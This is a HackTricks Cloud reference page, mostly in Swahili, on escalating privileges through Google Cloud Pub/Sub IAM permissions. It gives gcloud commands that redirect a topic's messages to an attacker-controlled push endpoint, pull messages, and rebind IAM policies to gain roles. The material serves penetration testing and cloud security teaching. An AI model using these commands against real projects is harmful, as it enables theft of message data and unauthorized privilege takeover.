GCP - Pubsub Privesc

Tip

Jifunze na ufanye mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na ufanye mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na ufanye mazoezi ya Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Saidia HackTricks

Angalia the subscription plans!

Jiunge na 💬 Discord group au the telegram group au utufuate kwenye Twitter 🐦 @hacktricks_live.

Shiriki hacking tricks kwa kutuma PRs kwa HackTricks and HackTricks Cloud github repos.

PubSub

Pata habari zaidi katika:

GCP - Pub/Sub Enum

`pubsub.snapshots.create` (`pubsub.topics.attachSubscription`)

Snapshots za topics zinajumuisha ujumbe wa sasa ambao ni unACKed na kila ujumbe uliofuata. Unaweza kuunda snapshot ya topic ili kupata ujumbe yote, kukwepa kufikia topic moja kwa moja.

gcloud pubsub subscriptions create <subscription_name> --topic <topic_name> --push-endpoint https://<URL_to_push_to>

`pubsub.snapshots.setIamPolicy`

Jipatie ruhusa zilizotangulia.

`pubsub.subscriptions.create`

Unaweza kuunda push subscription katika topic ambayo itatuma messages zote zinazopokelewa kwa URL iliyotajwa

`pubsub.subscriptions.update`

Weka URL yako mwenyewe kama push endpoint ili kuiba messages.

`pubsub.subscriptions.consume`

Pata messages kwa kutumia subscription.

gcloud pubsub subscriptions pull <SUSCRIPTION> \
--limit=50 \
--format="json" \
--project=<PROJECTID>

`pubsub.subscriptions.setIamPolicy`

Jipe ruhusa zozote za awali

# Add Binding
gcloud pubsub subscriptions add-iam-policy-binding <SUSCRIPTION_NAME> \
--member="serviceAccount:<SA_NAME>@<PROJECT_ID>.iam.gserviceaccount.com" \
--role="<ROLE_OR_CUSTOM_ROLE>" \
--project="<PROJECT_ID>"

# Remove Binding
gcloud pubsub subscriptions remove-iam-policy-binding <SUSCRIPTION_NAME> \
--member="serviceAccount:<SA_NAME>@<PROJECT_ID>.iam.gserviceaccount.com" \
--role="<ROLE_OR_CUSTOM_ROLE>" \
--project="<PROJECT_ID>"

# Change Policy
gcloud pubsub subscriptions set-iam-policy <SUSCRIPTION_NAME> \
<(echo '{
"bindings": [
{
"role": "<ROLE_OR_CUSTOM_ROLE>",
"members": [
"serviceAccount:<SA_NAME>@<PROJECT_ID>.iam.gserviceaccount.com"
]
}
]
}') \
--project=<PROJECT_ID>

Tip

Jifunze na ufanye mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na ufanye mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na ufanye mazoezi ya Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Saidia HackTricks

Angalia the subscription plans!

Jiunge na 💬 Discord group au the telegram group au utufuate kwenye Twitter 🐦 @hacktricks_live.

Shiriki hacking tricks kwa kutuma PRs kwa HackTricks and HackTricks Cloud github repos.